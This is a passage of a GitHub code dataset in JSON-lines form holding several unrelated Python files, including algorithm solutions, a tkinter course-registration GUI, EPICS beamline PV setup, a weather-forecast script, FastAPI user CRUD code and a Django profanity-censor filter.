print(max(time.values()))","repo_name":"olzlrlo/algorithms","sub_path":"BOJ/02056.py","file_name":"02056.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14325440733","text":"from scipy import sparse\nimport numpy as np\nimport time\nfrom fast_histogram import histogram1d\nimport matlab.engine\n\neng = matlab.engine.start_matlab()\n\n\ndef fgsd_features(graph_list):\n\n S_max = 0\n S_list = []\n print('Computing pseudo inverse...')\n t = time.time()\n for i, A in enumerate(graph_list):\n if (i + 1) % 1000 == 0:\n print('num graphs processed so far: ', i + 1)\n A = np.array(A.todense(), dtype=np.float32)\n D = np.sum(A, axis=0)\n L = np.diag(D) - A\n\n ones_vector = np.ones(L.shape[0])\n try:\n fL = np.linalg.pinv(L)\n except np.linalg.LinAlgError:\n fL = np.array(eng.fgsd_fast_pseudo_inverse(matlab.double(L.tolist()), nargout=1))\n fL[np.isinf(fL)] = 0\n fL[np.isnan(fL)] = 0\n\n S = np.outer(np.diag(fL), ones_vector) + np.outer(ones_vector, np.diag(fL)) - 2 * fL\n if S.max() > S_max:\n S_max = S.max()\n S_list.append(S)\n\n print('S_max: ', S_max)\n print('Time Taken: ', time.time() - t)\n\n feature_matrix = []\n nbins = 1000000\n range_hist = (0, S_max)\n print('Computing histogram...')\n t = time.time()\n for i, S in enumerate(S_list):\n if (i + 1) % 1000 == 0:\n print('num graphs processed so far: ', i + 1)\n # hist, _ = np.histogram(S.flatten(), bins=nbins, range=range_hist)\n hist = histogram1d(S.flatten(), bins=nbins, range=range_hist)\n hist = sparse.csr_matrix(hist)\n feature_matrix.append(hist)\n print('Time Taken: ', time.time() - t)\n\n feature_matrix = sparse.vstack(feature_matrix)\n return feature_matrix\n","repo_name":"vermaMachineLearning/Universal-Graph-Embedding-Neural-Network","sub_path":"utils/fast_fgsd_features.py","file_name":"fast_fgsd_features.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"66"} +{"seq_id":"70893422931","text":"import pygame\nfrom quizz.class_ecra_menu import Menu\nfrom quizz.class_ecra_jogar import Jogar\nfrom quizz.class_ecra_login import Login\n\nclass Jogo:\n titulo = \"Quizz\"\n tamanho_ecra = (768, 768)\n estado = None\n eventos = None\n ecra = None\n relogio = None\n ecras = {\n \"login\": Login,\n \"menu\": Menu,\n \"jogar\": Jogar,\n \"perguntas\": Menu,\n \"pontuacoes\": Menu,\n \"nivelJogo\": Menu,\n }\n nome_utilizador = None\n categorias_seleccionadas = []\n centro_ecra = None\n\n def __init__(self):\n pygame.font.init()\n pygame.display.set_caption(self.titulo)\n self.relogio = pygame.time.Clock()\n self.ecra = pygame.display.set_mode(self.tamanho_ecra)\n self.centro_ecra = self.ecra.get_rect().center\n self.estado = self.ecras[\"login\"](self)\n\n self.construir()\n\n def construir(self):\n # Iniciar ciclo\n while True:\n self.eventos_globais()\n self.estado.construir(self)\n # Atualizar o ecra 60 vezes a cada segundo\n pygame.display.update()\n self.relogio.tick(60)\n\n def eventos_globais(self):\n self.eventos = pygame.event.get()\n for evento in self.eventos:\n # Se evento for do tipo QUIT\n if evento.type == pygame.QUIT:\n # Fechar janela e sai do jogo\n pygame.quit()\n exit()\n ","repo_name":"drweizak/quizz-advanced-workshop","sub_path":"quizz/class_jogo.py","file_name":"class_jogo.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42899438347","text":"import re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tkinter\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo, askyesno\nfrom static_view import StaticView\nfrom register_controller import RegisterController\ndef clear_treeview(treeview):\n for i in treeview.get_children():\n treeview.delete(i)\ndef register_to_tuple(register):\n return tuple([register.register_id,register.subject.subject_id,\n register.subject.name,register.student.student_id,\n register.student.name,register.register_time])\nclass RegisterView:\n def __init__(self,frame,student_view,subject_view):\n super().__init__()\n self.frame = frame\n self.registers = []\n self.add_table_register()\n self.create_search_frame()\n self.creat_frame_sort()\n self.create_register_frame(student_view,subject_view)\n self.create_btn_frame(student_view,subject_view)\n\n def add_table_register(self):\n column = ['c1','c2','c3','c4','c5','c6']\n self.table_register = ttk.Treeview(self.frame,columns=column,show='headings',height=9,selectmode='browse')\n self.table_register.grid(column=0,row=0,columnspan=3,sticky=tkinter.NSEW)\n\n style = ttk.Style()\n style.theme_use('alt') # other theme can use: clam, classic, default\n style.configure('my.Treeview.Heading', font=('Calibri', 11, 'bold'),\n background='#33CCFF', foreground='#ffffff')\n self.table_register.configure(style='my.Treeview')\n\n self.table_register.heading('c1',text='Mã đăng ký')\n self.table_register.heading('c2',text='Mã môn học')\n self.table_register.heading('c3',text='Tên môn học')\n self.table_register.heading('c4',text='Mã sinh viên')\n self.table_register.heading('c5',text='Họ và tên')\n self.table_register.heading('c6',text='Thời gian')\n\n self.table_register.column(0,stretch=tkinter.NO,width=150,minwidth=150,anchor=tkinter.CENTER)\n self.table_register.column(1,stretch=tkinter.NO,width=150,minwidth=150,anchor=tkinter.CENTER)\n self.table_register.column(2,stretch=tkinter.NO,width=250,minwidth=250)\n self.table_register.column(3,stretch=tkinter.NO,width=150,minwidth=150,anchor=tkinter.CENTER)\n self.table_register.column(4,stretch=tkinter.NO,width=200,minwidth=200)\n self.table_register.column(5,stretch=tkinter.NO,width=250,minwidth=250,anchor=tkinter.CENTER)\n\n def create_search_frame(self):\n self.search_var = tkinter.StringVar()\n frm_search = ttk.LabelFrame(self.frame, text='Tìm kiếm')\n # config set all columns have same width space\n frm_search.columnconfigure(0, weight=1, uniform='fred')\n frm_search.columnconfigure(1, weight=1, uniform='fred')\n frm_search.grid(row=1, column=0, sticky=tkinter.NSEW, pady=4, padx=4)\n # add combobox\n ttk.Label(frm_search, text='Tiêu chí tìm kiếm:'). \\\n grid(row=0, column=0, sticky=tkinter.W, pady=4, padx=4)\n type = ['Theo mã sinh viên','Theo mã môn học']\n self.combo_search = ttk.Combobox(frm_search, textvariable=self.search_var,values=type)\n self.combo_search.grid(row=1, column=0, padx=4, pady=4, sticky=tkinter.W,\n ipady=4, ipadx=4)\n # add search part\n ttk.Label(frm_search, text='Từ khóa:'). \\\n grid(row=0, column=1, sticky=tkinter.W, padx=4, pady=4)\n self.search_entry = ttk.Entry(frm_search)\n self.search_entry.grid(row=1, column=1, sticky=tkinter.EW, padx=4, pady=4,\n ipadx=4, ipady=4)\n\n self.btn_search = ttk.Button(frm_search, text='Tìm kiếm', width=15,command=self.search_by_key)\n self.btn_search.grid(row=2, column=1, padx=4, pady=4)\n\n def creat_frame_sort(self):\n self.sort_var = tkinter.IntVar(value=0)\n frm_sort= ttk.LabelFrame(self.frame, text='Sắp xếp')\n # config set all columns have same width space\n frm_sort.columnconfigure(0, weight=1, uniform='fred')\n frm_sort.columnconfigure(1, weight=1, uniform='fred')\n frm_sort.grid(row=1, column=1, sticky=tkinter.NSEW, pady=4, padx=4)\n\n ttk.Radiobutton(frm_sort, text='Thứ tự đăng ký sớm-muộn', value=1,\n variable=self.sort_var,command=self.sort_by_time). \\\n grid(row=0, column=0, pady=4, padx=4, sticky=tkinter.W)\n ttk.Radiobutton(frm_sort, text='Thứ tự đăng ký muộn-sớm',\n value=2, variable=self.sort_var,command=self.sort_by_time_d). \\\n grid(row=1, column=0, pady=4, padx=4, sticky=tkinter.W)\n ttk.Radiobutton(frm_sort, text='Theo mã môn học tăng dần',\n value=3, variable=self.sort_var,command=self.sort_by_id_sub). \\\n grid(row=0, column=1, pady=4, padx=4, sticky=tkinter.W)\n ttk.Radiobutton(frm_sort, text='Theo mã sinh viên tăng dần',\n value=4, variable=self.sort_var,command=self.sort_by_id_student). \\\n grid(row=1, column=1, pady=4, padx=4, sticky=tkinter.W)\n\n def create_register_frame(self,student_view,subject_view):\n frm_register = ttk.LabelFrame(self.frame,text='Đăng ký môn học')\n frm_register.grid(column=2,row=1,sticky=tkinter.NSEW,padx=4,pady=4)\n frm_register.grid_columnconfigure(0,weight=1,uniform='fred')\n frm_register.grid_columnconfigure(1,weight=1,uniform='fred')\n\n frm_register.rowconfigure(0, weight=1, uniform='fred')\n frm_register.rowconfigure(1, weight=1, uniform='fred')\n frm_register.rowconfigure(2, weight=1, uniform='fred')\n\n ttk.Label(frm_register,text='Mã sinh viên').grid(column = 0 ,row=0,pady=4,padx=16)\n ttk.Label(frm_register,text='Mã môn học').grid(column = 0,row=1,padx=16,pady=4)\n\n self.entry_id_student = ttk.Entry(frm_register)\n self.entry_id_student.grid(column=1,row=0,padx=16,pady=4)\n\n self.entry_id_sub = ttk.Entry(frm_register)\n self.entry_id_sub.grid(column=1,row=1,padx=16,pady=4)\n\n self.btn_ok = ttk.Button(frm_register,text='REGISTER',command=lambda : self.register_subject(student_view,subject_view))\n self.btn_ok.grid(column=1,row=2,pady=4,padx=4)\n\n def create_btn_frame(self,students,subjects):\n self.frm_btn = ttk.LabelFrame(self.frame,text='Các thao tác')\n self.frm_btn.grid(column=0,row=2,columnspan=3,sticky=tkinter.NSEW)\n self.frm_btn.grid_columnconfigure(0,weight=1)\n self.frm_btn.grid_columnconfigure(1,weight=1)\n self.frm_btn.grid_columnconfigure(2,weight=1)\n self.frm_btn.grid_columnconfigure(3,weight=1)\n\n\n self.btn_load = ttk.Button(self.frm_btn,text='Làm mới',command=lambda :self.load_register(students,subjects))\n self.btn_load.grid(column=0,row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n self.btn_static = ttk.Button(self.frm_btn, text='Thống kê',command=self.static)\n self.btn_static.grid(column=1, row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n self.btn_draw = ttk.Button(self.frm_btn, text='Vẽ biểu đồ',command=self.draw_chart)\n self.btn_draw.grid(column=2, row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n self.btn_delete = ttk.Button(self.frm_btn, text='Xoá',command=self.delete_item)\n self.btn_delete.grid(column=3, row=0,pady=8,padx=8,ipady=8,ipadx=16)\n\n def load_register(self,students,subject):\n self.registers.clear()\n s = RegisterController()\n if len(students.students) == 0 or len(subject.subjects) == 0:\n showinfo(message='Lỗi danh sách rỗng')\n else:\n self.registers = s.read_data(students.students,subject.subjects)\n self.show_table_register()\n\n def show_table_register(self):\n clear_treeview(self.table_register)\n index = 1\n self.table_register.selection_clear()\n for i in self.registers:\n if index % 2 == 0:\n tag = 'even'\n else:\n tag = 'odd'\n self.table_register.insert('', tkinter.END, values=register_to_tuple(i), tags=(tag,))\n index += 1\n\n def sort_by_time(self):\n s = RegisterController()\n s.sort_by_time(self.registers)\n self.show_table_register()\n\n def sort_by_time_d(self):\n s = RegisterController()\n s.sort_by_time_d(self.registers)\n self.show_table_register()\n\n def sort_by_id_sub(self):\n s = RegisterController()\n s.sort_by_id_sub(self.registers)\n self.show_table_register()\n\n def sort_by_id_student(self):\n s = RegisterController()\n s.sort_by_id_student(self.registers)\n self.show_table_register()\n\n def search_by_key(self):\n type = self.combo_search.get()\n key = self.search_entry.get()\n s = RegisterController()\n if len(type) == 0 or len(key) == 0:\n showinfo(message='Lỗi key hoặc tiêu chí tìm kiếm không được rỗng')\n else:\n if type == 'Theo mã sinh viên':\n pattern = '^SV\\\\d{4}$'\n if re.match(pattern,key):\n self.registers = s.search_by_id_student(self.registers,key)\n self.show_table_register()\n else:\n showinfo(message='Lỗi mã sinh vien không hợp lệ')\n else:\n if key.isdigit() is True and int(key) > 1000:\n self.registers = s.search_by_id_subject(self.registers,int(key))\n self.show_table_register()\n else:\n showinfo(message='Lỗi mã môn học phải là số nguyên lớn hơn 1000')\n def check_register_exist(self,register):\n for i in self.registers:\n if i.student.student_id == register.student.student_id and i.subject.subject_id == register.subject.subject_id:\n return True\n return False\n def register_subject(self,students,subjects):\n s = RegisterController()\n id_student = self.entry_id_student.get()\n id_subject = self.entry_id_sub.get()\n pattern = '^SV\\\\d{4}$'\n if re.match(pattern, id_student) and id_subject.isdigit() and int(id_subject) > 1000:\n register = s.add(students.students,subjects.subjects,int(id_subject),id_student)\n if register is not None:\n if self.check_register_exist(register):\n showinfo(message='Sinh viên đã đăng ký môn học trước đó')\n else:\n self.registers.append(register)\n self.show_table_register()\n showinfo(message='Đăng ký thành cong')\n else:\n showinfo(message='Sinh viên hoặc môn học không tồn tại')\n else:\n showinfo(message='Mã sinh viên hoặc mã môn học không hợp lệ')\n\n def delete_item(self):\n item = self.table_register.selection()\n if len(item) == 0:\n showinfo(message='Lỗi danh sách rỗng')\n else:\n id = self.table_register.set(item[0], column='c1')\n for i in self.registers:\n if i.register_id == int(id):\n self.registers.remove(i)\n\n if len(item) == 0:\n showinfo(message='Lỗi danh sách rỗng')\n else:\n ask = askyesno(message='Bạn có chắc chắn muốn xóa ?')\n if ask:\n for i in item:\n self.table_register.delete(i)\n showinfo(message='Xóa thành công')\n\n def create_dic(self):\n dic = {}\n for i in self.registers:\n if i.subject.subject_id in dic:\n dic[i.subject.subject_id] += 1\n else:\n dic[i.subject.subject_id] = 1\n return dic\n def getname(self,id):\n for i in self.registers:\n if i.subject.subject_id == id:\n return i.subject.name\n\n def static(self):\n list = []\n dic = self.create_dic()\n if len(dic) == 0 :\n showinfo(message='Lỗi danh sach rỗng')\n else:\n stt = 1\n for i in dic.keys():\n list.append(tuple([stt,i,self.getname(i),dic[i]]))\n stt += 1\n stat = StaticView(list)\n stat.mainloop()\n def draw_chart(self):\n dic = self.create_dic()\n if len(dic) == 0 :\n showinfo(message='Lỗi danh sach rỗng')\n else:\n num_subjects = []\n lable = []\n for i in dic.keys():\n num_subjects.append(dic[i])\n lable.append(i)\n\n subjects = np.array(num_subjects)\n plt.pie(subjects, labels=lable, shadow=True, startangle=45,\n autopct='%1.2f%%', textprops={'color': '#ffffff'})\n plt.title('Biểu đồ phân bố đăng ký môn học')\n plt.legend(loc = 1 ,title = 'Môn học: ')\n plt.show()\n\n\n","repo_name":"anhduc1234567/PythonBase","sub_path":"ProjectEnd/register_view.py","file_name":"register_view.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17205206783","text":"from django import template\n\nregister = template.Library()\n\n\nCENSOR = [\n 'бля', 'пизд', 'еба','хуй', 'хуе',\n]\n\n@register.filter(name='censor')\ndef censor(text: str):\n text_list = text.split()\n for i in range(len(text_list)):\n for c in CENSOR:\n if text_list[i].lower().find(c) >= 0:\n text_list[i] = '***'\n return ' '.join(text_list)\n","repo_name":"irynaludanova/wow_django","sub_path":"blog/templatetags/custom_filters.py","file_name":"custom_filters.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22140934382","text":"\"\"\"\nCreated on Wed Oct 27 10:28:14 2021\n\n@author: graceluo\n\nCreate and get PVobjects\n\n\"\"\"\n#!/home/beams/USERBNP/.conda/envs/py36/bin/python\n\nimport epics, sys, datetime\nimport numpy as np\nfrom misc import getCurrentTime\nimport epics.devices\nfrom epics import caput, caget\n\n# Eiger object is create for accessing camera related attributes\nclass eiger(object):\n def __init__(self, cam_pv_str, file_pv_str):\n self.pvstr = cam_pv_str\n self.cam = epics.devices.AD_Camera(cam_pv_str)\n self.fileIO = epics.devices.AD_FilePlugin(file_pv_str)\n \n def setNumTriggers(self, numTriggers):\n caput('%sNumTriggers'%self.pvstr, numTriggers)\n \n def getNumTriggers(self):\n return caget('%sNumTriggers'%self.pvstr)\n\n\nclass pvObject(object):\n def __init__(self, pv_str, pv_key, onchange_callback=False):\n self.pv = epics.PV(pv_str)\n self.pvname = pv_key\n self.putvalue = self.pv.value\n self.put_complete = 0\n self.motor_ready = 1\n self.time_pre = None #datetime of PV when connected or previous value change\n self.time_delta = 0 #time difference in sec btw its value change\n if onchange_callback:\n self.pv.add_callback(self.onChanges)\n \n \n def onPutComplete(self, pvname=None, **kws):\n sys.stdout.write('%s: Finish updating PV %s with value of %s\\n'\\\n %(getCurrentTime(), self.pvname, str(self.putvalue)))\n self.put_complete = 1\n \n def onChanges(self, pvname=None, **kws):\n \n if self.time_pre is None: \n self.time_pre = datetime.datetime.now()\n else:\n curtime = datetime.datetime.now()\n self.time_delta = (curtime-self.time_pre).seconds\n self.time_pre = curtime\n \n sys.stdout.write('%s: previous time:%s, delta time:%s\\n'\n %(getCurrentTime(), self.time_pre, self.time_delta))\n\n \n def put_callback(self, v = None):\n self.put_complete = 0\n if v is not None:\n self.putvalue = v\n self.pv.put(self.putvalue, callback=self.onPutComplete)\n\n def motorReady(self, rqspv, tolerance = 4e-2):\n rqsvalue = np.round(rqspv.value, 2)\n if abs((np.round(self.pv.value, 2) - rqsvalue)) < tolerance:\n self.motor_ready = 1\n else:\n rqspv.put(rqsvalue)\n self.motor_ready = 0\n \n \ndef definePVs():\n pvs = {'x_center_Rqs':'9idbTAU:SM:PX:RqsPos', 'x_center_Act':'9idbTAU:SM:PX:ActPos',\n 'y_center_Rqs':'9idbTAU:SY:PY:RqsPos', 'y_center_Act':'9idbTAU:SY:PY:ActPos',\n 'z_value_Rqs':'9idbTAU:SM:SZ:RqsPos', 'z_value_Act':'9idbTAU:SM:SZ:ActPos',\n 'tomo_rot_Rqs':'9idbTAU:SM:CT:RqsPos', 'tomo_rot_Act':'9idbTAU:SM:CT:ActPos',\n 'sm_rot_Rqs':'9idbTAU:SM:ST:RqsPos', 'sm_rot_Act':'9idbTAU:SM:ST:ActPos',\n 'x_width':'9idbBNP:scan1.P1WD', 'y_width':'9idbBNP:scan2.P1WD',\n 'x_step':'9idbBNP:scan1.P1SI', 'y_step':'9idbBNP:scan2.P1SI',\n 'dwell':'9idbBNP:scanTran3.C', 'BDA_pos':'9idbTAU:UA:UX:RqsPos',\n 'det_time':'9idbBNP:3820:ElapsedReal', '1D_time':'9idbBNP:scanTran4.F',\n 'xmap_stp':'9idbXMAP:StopAll', 'netCDF_stp':'9idbXMAP:netCDF1:Capture',\n 'mcs_stp':'9idbBNP:3820:StopAll', 'mcs_status':'9idbBNP:3820:Acquiring',\n 'xmap_status':'9idbXMAP:Acquiring', 'netCDF_save':'9idbXMAP:netCDF1:WriteFile',\n 'netCDF_status':'9idbXMAP:netCDF1:WriteFile_RBV',\n 'collect_mode':'9idbXMAP:CollectMode',\n 'y_motor_ready':'9idbTAU:SY:Ps:Ready', 'xztp_motor_ready':'9idbTAU:SM:Ps:Ready',\n 'x_piezo_val':'9idbTAU:M7009.VAL', 'y_piezo_val':'9idbTAU:M7010.VAL',\n 'scan2Record':'9idbBNP:scan2',\n \n \n\n 'x_motorMode':'9idbTAU:SM:Ps:xMotionChoice.VAL',\n 'y_motorMode':'9idbTAU:SY:Ps:yMotionChoice.VAL',\n 'x_updatecenter':'9idbBNP:scan1.P1CP', 'y_updatecenter':'9idbBNP:scan2.P1CP',\n # 'x_setcenter':'9idbBNP:aoRecord11.PROC', 'y_setcenter':'9idbBNP:aoRecord12.PROC',\n 'piezo_xCenter':'9idbTAU:SM:Ps:xCenter.PROC',\n 'piezo_yCenter':'9idbTAU:SY:Ps:yCenter.PROC',\n 'tot_lines':'9idbBNP:scan2.NPTS', 'cur_lines':'9idbBNP:scan2.CPT',\n 'tot_pts_perline':'9idbBNP:scan1.NPTS',\n \n\n 'CryoCon1:In_1':'9idbCRYO:CryoCon1:In_1:Temp.VAL',\n 'CryoCon1:In_3':'9idbCRYO:CryoCon1:In_3:Temp.VAL',\n 'CryoCon1:In_2':'9idbCRYO:CryoCon1:In_2:Temp.VAL',\n 'CryoCon3:In_2':'9idbCRYO:CryoCon3:In_2:Temp.VAL',\n 'CryoCon3:Loop_2':'9idbCRYO:CryoCon3:Loop_2:SetControl.VAL',\n\n\n 'run':'9idbBNP:scan2.EXSC', 'wait':'9idbBNP:scan2.WAIT', 'wait_val':'9idbBNP:scan2.WCNT',\n 'pause':'9idbBNP:scan1.PAUS', 'abort':'9idbBNP:AbortScans.PROC', \n 'msg1d':'9idbBNP:scan1.SMSG',\n 'fname_saveData':'9idbBNP:saveData_fileName',\n 'filesys':'9idbBNP:saveData_fileSystem',\n 'subdir':'9idbBNP:saveData_subDir',\n 'nextsc':'9idbBNP:saveData_scanNumber',\n 'basename':'9idbBNP:saveData_baseName',\n \n }\n return pvs\n \ndef scan2RecordDetectorTrigerPVs():\n pvs = {'scan1':'9idbBNP:scan1.EXSC',\n 'eigerAcquire':'2iddEGR:cam1:Acquire',\n 'eigerFileCapture':'2iddEGR:HDF1:Capture'}\n return pvs\n \ndef getEiger():\n # create Eiger cam record\n e = eiger('2iddEGR:cam1:', '2iddEGR:HDF1:')\n return e\n \n# pvs = {'test1':'2idbleps:userTran2.CMTA', 'test2':'2idbleps:userTran2.CMTB', 'test3':'2idbleps:userTran2.CMTC',\n# 'test4':'2idbleps:userTran2.CMTD', 'test5':'2idbleps:userTran2.CMTE', 'test6':'2idbleps:userTran2.CMTF',\n# 'test7':'2idbleps:userTran2.CMTG'}\n\n\ndef getPVobj():\n pvObjs = {}\n pvs = definePVs()\n for k, v in pvs.items():\n if 'Record' not in k:\n pv_obj = pvObject(v, k, onchange_callback=True if '9idbBNP:scan2.CPT'==v else False)\n pvObjs.update({k: pv_obj})\n else:\n pvObjs.update({k:epics.devices.Scan(v)})\n return pvObjs\n","repo_name":"AdvancedPhotonSource/bnpTools","sub_path":"bnpGUI/pvObjects.py","file_name":"pvObjects.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5874808279","text":"from pathlib import Path\nfrom geopy.geocoders import Nominatim\nimport requests\nimport pandas as pd\n\n\ndef get_forecast(city=\"Pittsburgh\"):\n \"\"\"\n Retrieves the weather forecast for a specified city.\n\n This function uses the Nominatim geocoding service to obtain the latitude and longitude\n coordinates of the specified city. It then constructs a URL to access the weather forecast\n data using the National Weather Service (NWS) API. The API response is processed to extract\n the forecast periods, and the forecast for the \"Tonight\" period is returned.\n\n :param city: The name of the city for which to retrieve the weather forecast (default: Pittsburgh).\n :type city: str\n :return: A dictionary containing the weather forecast for the \"Tonight\" period.\n :rtype: dict\n \"\"\"\n\n geolocator = Nominatim(user_agent=\"ModernProgramming\")\n location = geolocator.geocode(city)\n URL = f\"https://api.weather.gov/points/{location.latitude},{location.longitude}\"\n response = requests.get(URL)\n response = requests.get(response.json()[\"properties\"][\"forecast\"])\n periods = response.json()[\"properties\"][\"periods\"]\n for period in periods:\n if period[\"name\"] == \"Tonight\":\n break\n\n return period\n\n\ndef main():\n \"\"\"\n Retrieves the weather forecast for a specified city and updates a DataFrame and README file.\n\n This function calls the `get_forecast` function to retrieve the weather forecast for a city\n (defaulting to Pittsburgh). It then updates a DataFrame containing forecast information. If\n a DataFrame file named \"weather.pkl\" exists, it loads the DataFrame; otherwise, it initializes\n a new DataFrame. The retrieved forecast information is appended to the DataFrame, and duplicate\n entries are removed. The updated DataFrame is saved back to the \"weather.pkl\" file.\n\n Additionally, this function generates a README markdown file for a GitHub repository. It includes\n badges indicating the status of repository workflows and presents the nightly forecast for Pittsburgh.\n The forecast information is formatted using the DataFrame's `to_markdown` method. Finally, a copyright\n notice is added to the README file.\n\n :return: None\n \"\"\"\n\n period = get_forecast()\n file = \"weather.pkl\"\n\n if Path(file).exists():\n df = pd.read_pickle(file)\n else:\n df = pd.DataFrame(columns=[\"Start Date\", \"End Date\", \"Forecast\"])\n\n datum = {\n \"Start Date\": period[\"startTime\"],\n \"End Date\": period[\"endTime\"],\n \"Forecast\": period[\"detailedForecast\"],\n }\n df = pd.concat([df, pd.DataFrame([datum])], ignore_index=True)\n\n df = df.drop_duplicates()\n df.to_pickle(file)\n\n # sort repositories\n file = open(\"README.md\", \"w\")\n file.write(\n \"![Status](https://github.com/icaoberg/\"\n + \"python-get-forecast/actions/workflows/build.yml/badge.svg)\\n\"\n )\n file.write(\n \"![Status](https://github.com/icaoberg/\"\n + \"python-get-forecast/actions/workflows/pretty.yml/badge.svg)\\n\"\n )\n file.write(\"# Pittsburgh Nightly Forecast\\n\\n\")\n file.write(df.to_markdown(tablefmt=\"github\"))\n file.write(\n \"\\n\\n---\\nCopyright © 2022-2023 Pittsburgh Supercomputing \"\n + \"Center. All Rights Reserved.\"\n )\n file.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"icaoberg/python-get-forecast","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1760673856","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfor i in range(0, int(input())):\n BONUS = int(input())\n A1, D1, L1 = input().split()\n A2, D2, L2 = input().split()\n\n G1 = ((int(A1) + int(D1)) / 2)\n G2 = ((int(A2) + int(D2)) / 2)\n if int(L1) % 2 == 0:\n G1 += BONUS\n if int(L2) % 2 == 0:\n G2 += BONUS\n if G1 == G2:\n print('Emapate')\n elif G1 > G2:\n print('Dabriel')\n else:\n print('Guarte')\n","repo_name":"quatroka/urionlinejudge","sub_path":"iniciante/python/2221.py","file_name":"2221.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"21487700161","text":"class Solution(object):\n def dfs(self,nums, prev):\n if not nums: return 1\n \n res = 0\n for i, num in enumerate(nums):\n if i and num == nums[i - 1]: continue\n s = num + prev\n if prev < 0 or int(sqrt(s))**2 == s:\n res += self.dfs(nums[:i] + nums[i+1:], num)\n return res\n def numSquarefulPerms(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n nums = sorted(nums)\n if not nums: return 0\n return self.dfs(nums, -1) \n","repo_name":"bontu-fufa/squid-game","sub_path":"numSquarefulPerms.py","file_name":"numSquarefulPerms.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43369400248","text":"# OPath\nfrom models.user_api_model import UserRegister\nfrom models.db_model import UserDB\nfrom utils.hashing import Hash\n# SQLAlchemy\nfrom sqlalchemy.orm import Session\n\n# Pydantic\nfrom pydantic import EmailStr\n\n# FastAPI\nfrom fastapi import HTTPException, status\n\n\ndef create(user: UserRegister, db: Session):\n user.password = Hash.hash_password(user.password)\n\n new_user = UserDB(**user.dict())\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n\n return new_user\n\n\ndef get_all(db: Session):\n users = db.query(UserDB).all()\n return users\n\n\ndef get(id: int, db: Session):\n user = db.query(UserDB).filter(\n UserDB.id == id).first()\n\n if not user:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND, \n detail=\"This user doesn't exist!\"\n )\n \n return user\n\n\ndef delete(id: int, db: Session):\n\n user = db.query(UserDB).filter(UserDB.id == id)\n\n if not user.first():\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"This user doesn't exist!\"\n ) \n\n user.delete(synchronize_session=False)\n db.commit()\n\n return None\n\n\ndef update(\n id: int,\n first_name: str,\n last_name: str,\n email: EmailStr,\n db: Session\n ):\n\n user = db.query(UserDB).filter(\n UserDB.id == id\n )\n\n if not user.first():\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"This user doesn't exist!\"\n )\n \n if not first_name: first_name = user.first().first_name\n if not last_name: last_name = user.first().last_name\n if not email: email = user.first().email\n\n user.update(\n {\n UserDB.first_name: first_name,\n UserDB.last_name: last_name, \n UserDB.email: email\n }\n )\n\n db.commit()\n\n return None","repo_name":"alec-ibp/twitter-api","sub_path":"twitter-api/repository/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9489770300","text":"import itertools\nimport math\nN = int(input())\nS = input()\nl = len(S)\n\n\n#oxooxoxoox\n#s → 1 w→-1\ntemp = []\nfor c in S:\n if c == \"o\":\n temp.append(1)\n else:\n temp.append(-1)\n\nS = temp\n\nflag = False\nfor i in [1,-1]: # 1匹目\n for j in [1,-1]: #2匹目\n nums = [i,j]\n temp = i * j\n for k in range(1,N-1):\n nums.append(temp * S[k])\n temp = nums[k] * nums[k + 1]\n if temp * nums[0] == S[-1] and nums[-1] * nums[0] * nums[1] == S[0]:\n flag = True\n break\n if flag:\n break\n\nif flag:\n for num in nums:\n if num == -1:\n print(\"W\",end=\"\")\n else:\n print(\"S\", end=\"\")\n\nelse:\n print(-1)\n\n","repo_name":"lilium513/competition_programing","sub_path":"69ARC/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22012034892","text":"import csv\n\ndef read_csv_file(filename):\n try:\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n data = [row for row in csv_reader]\n except FileNotFoundError:\n print('Error, file specified not found in current directory!')\n return None\n return data\n\n\ndef validate_keys(data, kwargs):\n columns_in_table = data[0]\n for key in kwargs.keys():\n if key not in columns_in_table:\n return False\n return True\n\n\ndef are_arguments_in_current_row(row, kwargs):\n for arg_value in kwargs.values():\n if arg_value not in row:\n return False\n return True\n\n\ndef filter(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n matched_rows = []\n are_kwargs_valid = validate_keys(csv_data, kwargs)\n if are_kwargs_valid:\n for row in csv_data[1:]:\n 